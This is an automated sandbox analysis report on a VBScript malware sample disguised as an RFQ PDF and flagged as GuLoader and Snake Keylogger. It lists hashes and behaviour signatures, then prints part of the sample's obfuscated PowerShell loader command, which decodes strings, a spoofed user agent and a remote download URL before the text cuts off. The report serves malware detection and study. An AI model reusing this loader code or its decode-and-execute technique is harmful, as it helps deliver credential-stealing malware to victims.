Edit tour
Windows
Analysis Report
RFQ_64182MR_PDF.R00.vbs
Overview
General Information
| Sample name: | RFQ_64182MR_PDF.R00.vbs |
| Analysis ID: | 1540842 |
| MD5: | 63a5b7d958f537744c5330b3fef8ccac |
| SHA1: | 00ba79f887c403afabdd6ffe21db30e82288f84b |
| SHA256: | ee763e48dad8e005251345990a572ccbf15929e76c5fa68ab3d1fc80ef7e5286 |
| Tags: | vbsuser-abuse_ch |
| Infos: |   |
 | |
Detection
GuLoader, Snake Keylogger
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Snake Keylogger
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 2032 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\RFQ_6 4182MR_PDF .R00.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 3300 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" " <#Besprj tet Playst ow Stunsai l Vrangfor estillinge rs ergotis ms Idealis m Overthro wing #>;$R equestione rntrenchan t='Gem';<# Formanings Reaktion Randmorner Backwall protore #> ;$Oplyser= $Syriacism +$host.UI; function Franarrend es($Kampuc heanske){I f ($Oplyse r) {$Grang erizer++;} $Automobil er=$Forsna kket+$Kamp ucheanske. 'Length'-$ Grangerize r; for( $R equestione r=5;$Reque stioner -l t $Automob iler;$Requ estioner+= 6){$Heaven ward214=$R equestione r;$Ressent imentsflel sers+=$Kam pucheanske [$Requesti oner];$Spi ndleshanks ='Nougatfa rvede255'; }$Ressenti mentsflels ers;}funct ion Forbin dingers($S weateren){ . ($Le ukophoresi s) ($Sweat eren);}$Mo dularitete n85=Franar rendes 'Ru m eM lunno No anzKonk ui Zircl E nerl Annaa Offgo/ Exp e ';$Modul ariteten85 +=Franarre ndes 'Forh a5Genn..Ol ief0Munde Qeth(kamle WD speiW.r lonIag tdG rundoTyd.l wNordis.in ds St rN U ndeTVolun Aphyl1Foun d0Orrtr. F art0Dunel; Attem room W.ettiiKon omnRe dd6 Anab4 Ach ; Tand S.m psxChamp6T orve4Snkni ;N.mph Car bor Vaa vU nder:forby 1Agnat3For eb1Hydro. nond0 M ga )Bolig Fil msG B koeS viencM not kDesmooBet t/Sp ci2D isfo0Frak, 1Curvi0kli m 0Enfol1N a ur0 Fops 1 Sni Tand pF mageiso brarAftrae ,ofanf Ind ioInvarxSa ftf/Skole1 Sky r3Yder p1 Para.ad ven0Fall ' ;$Regneteg net=Franar rendes 'Ni ffeU SonoS PreleEStam srLoz n-Fr ontAVideoG Po.uleDi d enFejletNo wel ';$Del ggelses=Fr anarrendes 'BrookhTs nintUnpert unasspOdon sCentr: a an/ Bygn/P r.grdD,sge rUdnytiFls omv Non eW oods.Omheg gDhurroSkr aoInflegH elpilH lef eLinne.pho tocNo.gao iphom varm /Avl.suReb ubc Abru?I .kvieKomp, xKo tep.pi skoOver rB riskt En e =Prosed fv nnounig,wB u.den Fjen l ArusoCen raSaggidR et r&Klene i OmvedDof m= ktio1S altiO emou B.otlcBac sV EmulAAp petKPseu,u RespicPuge nyTim rFCr ocugAnkoms Klemry ver slS,jlgES ewa0Aaref- F remRKend iUOnla 3Wa rguElvilZ Klbnk Dif fN SdnidBo g,veSemid2 .emia.itt elsyfilM S emiJUne lP Omdig ';$C oleopteroi d=Franarre ndes 'Coff >Disge '; $Leukophor esis=Frana rrendes 'V ,ticiWound ECi.enxSyn on ';$Requ estionernk assoerne=' Papyroplas tics';$Kon tagis='\Pl atyhelmint hic195.End ';Forbindi ngers (Fra narrendes 'Knivs$Spi seGG ssel SkijoL,nkb BRa ziA Re mrlD.gab: V,ewDChinb e AcuicY,l loaPeachRS noenbRhabd oMen oN Mi .tYantihl Sta.aFavo. TU stoESys tedDextr= Coar$Remus EEn.rvNTra nsvsan.s:G tebaa Sikk pP ethPDi pedPunteAS tunnTforlg ABackn+Sek ul$.romaK, ermuOHazan NGreevtInd vaARiob,gC ymbeIGenfo STraum '); Forbinding ers (Frana rrendes 'C uisi$C,lii GlingeL ar adO.ommebw hip aRebou lLabio: Fr iglDatasIL obelTCurt hfrygtOti. anP Brn hJ eq eI Flyv lrussiORek